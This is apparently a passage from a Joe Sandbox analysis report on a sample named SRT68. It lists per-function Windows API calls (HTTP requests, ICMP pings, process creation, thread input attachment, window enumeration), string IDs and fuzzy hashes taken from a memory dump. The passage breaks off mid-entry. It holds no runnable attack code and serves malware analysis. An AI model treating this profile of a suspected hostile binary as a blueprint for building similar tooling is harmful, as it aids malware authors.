                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CoInitialize.OLE32 ref: 01018403
                                                                      • CoUninitialize.OLE32 ref: 0101840E
                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,01032BEC,?), ref: 0101846E
                                                                      • IIDFromString.OLE32(?,?), ref: 010184E1
                                                                      • VariantInit.OLEAUT32(?), ref: 0101857B
                                                                      • VariantClear.OLEAUT32(?), ref: 010185DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                      • API String ID: 834269672-1287834457
                                                                      • Opcode ID: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                      • Instruction ID: 897fc17f8cf10ec6d57a1eb8aa4b01478b0fe54be18ca88aed40e457f6cdf7ad
                                                                      • Opcode Fuzzy Hash: 63b6634fcf72d0885f481c777358da2b7e245721b2415d556a45f793fd371d2b
                                                                      • Instruction Fuzzy Hash: EE619A706083129FD711DF54C848B6EBBE8EF49754F04845EFAC29B295CB78EA44CB92
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 01015793
                                                                      • inet_addr.WSOCK32(?,?,?), ref: 010157D8
                                                                      • gethostbyname.WSOCK32(?), ref: 010157E4
                                                                      • IcmpCreateFile.IPHLPAPI ref: 010157F2
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01015862
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01015878
                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 010158ED
                                                                      • WSACleanup.WSOCK32 ref: 010158F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                      • Instruction ID: d52cf19432de51dbdede2190b6320cf10555723fe682f3c8cb75efd34091e3f1
                                                                      • Opcode Fuzzy Hash: da48a177ca712bb46fa627ae27ccc4ea1291c444f2bed792d6284f3fbeb77102
                                                                      • Instruction Fuzzy Hash: 1651B1716043019FDB20DF28DC46B2ABBE4EF8A710F044569F996EB295DB78E800DB52
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0100B4D0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0100B546
                                                                      • GetLastError.KERNEL32 ref: 0100B550
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0100B5BD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                      • Instruction ID: 7b11e9badf09275f4636cd53ead672d6c1cad404faa4da42d826f5ea156d8517
                                                                      • Opcode Fuzzy Hash: f09333af6b80af3444755e5ef2af148df39a2449ec5eb6d50dc60a482658f905
                                                                      • Instruction Fuzzy Hash: 8F31A579A002059FE751DF68CC45FAE7BB4FF09301F1441AAE941EB2D1DB769901CB51
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FF9014
                                                                      • GetDlgCtrlID.USER32 ref: 00FF901F
                                                                      • GetParent.USER32 ref: 00FF903B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF903E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00FF9047
                                                                      • GetParent.USER32(?), ref: 00FF9063
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF9066
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                      • Instruction ID: 9c04a728a7c92de148ed8de90209ac7b5518a2db9afeb5e1a357ff38f3ef0cd8
                                                                      • Opcode Fuzzy Hash: e258aa6022531639acf7694555ef7ff140cb6c338ae64681e173cd5c90b627f4
                                                                      • Instruction Fuzzy Hash: 7C21B2B4A00109BBDF24AFB0CC85EBEBB74EF49350F100119FA61972A1DB795819EB20
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                        • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FF90FD
                                                                      • GetDlgCtrlID.USER32 ref: 00FF9108
                                                                      • GetParent.USER32 ref: 00FF9124
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FF9127
                                                                      • GetDlgCtrlID.USER32(?), ref: 00FF9130
                                                                      • GetParent.USER32(?), ref: 00FF914C
                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FF914F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 1536045017-1403004172
                                                                      • Opcode ID: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                      • Instruction ID: 21126cf7a5dffb3d16521d806bc0b9b64cf3cc102e3921c643cee19bbd8b6567
                                                                      • Opcode Fuzzy Hash: df942b168750c14fa78e23003996c72a06521ef01d033f294ea5f8ac35db0625
                                                                      • Instruction Fuzzy Hash: D121C4B4A00109BBDF20AFA0CC89FFEBB74EF49300F100019FA51972A5DB794419EB20
                                                                      APIs
                                                                      • GetParent.USER32 ref: 00FF916F
                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00FF9184
                                                                      • _wcscmp.LIBCMT ref: 00FF9196
                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FF9211
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                      • API String ID: 1704125052-3381328864
                                                                      • Opcode ID: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                      • Instruction ID: 6c67cc9efbb5526c374b58321db88cf62953f8bf1af7e60aca7260a4531dc07b
                                                                      • Opcode Fuzzy Hash: 10448e0397efa43b7109d49a2247fd53d8047e6f9ff7279e0bda7e6ffc7f862e
                                                                      • Instruction Fuzzy Hash: FA11A73B64C30BB9EB252525DC0BFB737ACDF15770B20002AFE00E54B5EEA659517694
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 010188D7
                                                                      • CoInitialize.OLE32(00000000), ref: 01018904
                                                                      • CoUninitialize.OLE32 ref: 0101890E
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 01018A0E
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 01018B3B
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01032C0C), ref: 01018B6F
                                                                      • CoGetObject.OLE32(?,00000000,01032C0C,?), ref: 01018B92
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 01018BA5
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01018C25
                                                                      • VariantClear.OLEAUT32(?), ref: 01018C35
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2395222682-0
                                                                      • Opcode ID: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                      • Instruction ID: dcad1cdb61a8e734f9c5dfef949c68b352b2a8870247f05aefe87752098f4e2a
                                                                      • Opcode Fuzzy Hash: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
                                                                      • Instruction Fuzzy Hash: 56C136B1208305AFD700DF68C88492BBBE9FF89748F04895DF9899B251DB75EE05CB52
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01007A6C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafeVartype
                                                                      • String ID:
                                                                      • API String ID: 1725837607-0
                                                                      • Opcode ID: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                      • Instruction ID: d9e0c736ed0faa9c38062661b151cba33affd7a40e7c8ce02a6eafad0a748775
                                                                      • Opcode Fuzzy Hash: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
                                                                      • Instruction Fuzzy Hash: 67B1627190020A9FEB12DF98C885BBEBBF4FF49321F144469E6C1E7281D779A941CB91
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 010011F0
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01000268,?,00000001), ref: 01001204
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0100120B
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 0100121A
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0100122C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001245
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001257
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 0100129C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012B1
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                      • Instruction ID: 7cfe4f23110d39a0eb38d3baf1abb0c7747d4fe531bf5aa4d56806c6d1d956bd
                                                                      • Opcode Fuzzy Hash: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
                                                                      • Instruction Fuzzy Hash: DB31CEB5600204BBFB329F68D988FA93BFDEB58351F214155F980C61DAD77AD9408B60
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FAFAA6
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00FAFB45
                                                                      • UnregisterHotKey.USER32(?), ref: 00FAFC9C
                                                                      • DestroyWindow.USER32(?), ref: 00FE45D6
                                                                      • FreeLibrary.KERNEL32(?), ref: 00FE463B
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE4668
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                      • Instruction ID: ddcf3b1f50a67b3f0fac59644f2890aadbef0ec4b3f37e1fbc2bff158c06c182
                                                                      • Opcode Fuzzy Hash: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
                                                                      • Instruction Fuzzy Hash: C5A18F71701212CFCB29EF55C994B69F364BF06760F5442ADE80AAB261CB34ED16EF50
                                                                      APIs
                                                                      • EnumChildWindows.USER32(?,00FFA439), ref: 00FFA377
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumWindows
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 3555792229-1603158881
                                                                      • Opcode ID: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                      • Instruction ID: ca9141afbb1ac5e68058d1e1bb2830ca266b0740c8a95c3b3e20d23e96058db5
                                                                      • Opcode Fuzzy Hash: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
                                                                      • Instruction Fuzzy Hash: 1291B7B1A0060ADACB08EF60C842BFEFB74BF04350F548119D95DA7261DF356959FBA1
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00FA2EAE
                                                                        • Part of subcall function 00FA1DB3: GetClientRect.USER32(?,?), ref: 00FA1DDC
                                                                        • Part of subcall function 00FA1DB3: GetWindowRect.USER32(?,?), ref: 00FA1E1D
                                                                        • Part of subcall function 00FA1DB3: ScreenToClient.USER32(?,?), ref: 00FA1E45
                                                                      • GetDC.USER32 ref: 00FDCD32
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FDCD45
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FDCD53
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00FDCD68
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00FDCD70
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FDCDFB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                      • Instruction ID: 2a0467de679854fee67b6ee4bc812221f5df14b0dbe190016389e5346b60ffe2
                                                                      • Opcode Fuzzy Hash: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
                                                                      • Instruction Fuzzy Hash: 9571A471900206DFCF319F64CC84AAA7BB7FF49360F18426BED955A255C7359C81EB90
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01011A50
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01011A7C
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01011ABE
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01011AD3
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011AE0
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01011B10
                                                                      • InternetCloseHandle.WININET(00000000), ref: 01011B57
                                                                        • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                        • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
                                                                      • Opcode ID: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                      • Instruction ID: 55d240b1ef48634011a2a71b536a80d20b0c882d7d18e5df5d99e9ea534ccb3e
                                                                      • Opcode Fuzzy Hash: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                      • Instruction Fuzzy Hash: C641A3B1500209BFEB168F64CC89FFF7BACFF08354F104156FA859A149E7799A408BA0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0102F910), ref: 01018D28
                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0102F910), ref: 01018D5C
                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01018ED6
                                                                      • SysFreeString.OLEAUT32(?), ref: 01018F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                      • String ID:
                                                                      • API String ID: 560350794-0
                                                                      • Opcode ID: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                      • Instruction ID: 951e26c988f57dcba0c5b82ce2c07a59ea470626dbf83ab8655fad7348dd33b5
                                                                      • Opcode Fuzzy Hash: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                      • Instruction Fuzzy Hash: 7FF18A71A00209EFDF14DF98C884EAEBBB9FF49314F108099FA45AB255DB75AE41CB50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101F6B5
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F848
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F86C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8AC
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8CE
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101FA4A
                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0101FA7C
                                                                      • CloseHandle.KERNEL32(?), ref: 0101FAAB
                                                                      • CloseHandle.KERNEL32(?), ref: 0101FB22
                                                                      Memory Dump Source
